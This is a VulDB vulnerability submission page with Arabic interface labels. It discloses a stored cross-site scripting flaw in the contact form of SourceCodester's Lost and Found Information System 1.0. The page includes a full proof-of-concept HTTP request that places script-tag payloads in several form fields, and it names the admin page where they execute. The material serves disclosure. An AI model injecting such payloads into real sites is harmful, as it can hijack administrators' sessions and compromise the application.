إرسال #155183: Stored XSS in Lost and Found Information System 1.0 View message send from contact formالمعلومات

عنوان	Stored XSS in Lost and Found Information System 1.0 View message send from contact form
الوصف	Detail: Stored XSS in Lost and Found Information System 1.0 in admin View message send from contact form Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Production: Lost and Found Information System Version: 1.0 Request: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889 Content-Length: 839 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/?page=contact Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="id" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="visitor" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="fullname" Tuan"><script>alert('1')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="email" [email protected] -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="contact" Tuan"><script>alert('2')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="message" Tuan"><script>alert('3')</script> -----------------------------3651031312771010866996354889-- View effect: /php-lfis/admin/?page=inquiries/view_inquiry&id=2
المصدر	⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
المستخدم	huutuanbg97 (UID 45015)
ارسال	11/05/2023 03:33 PM (3 سنوات منذ)
الاعتدال	12/05/2023 08:01 AM (16 hours later)
الحالة	تمت الموافقة
إدخال VulDB	228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message البرمجة عبر المواقع]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Want to know what is going to be exploited?

We predict KEV entries!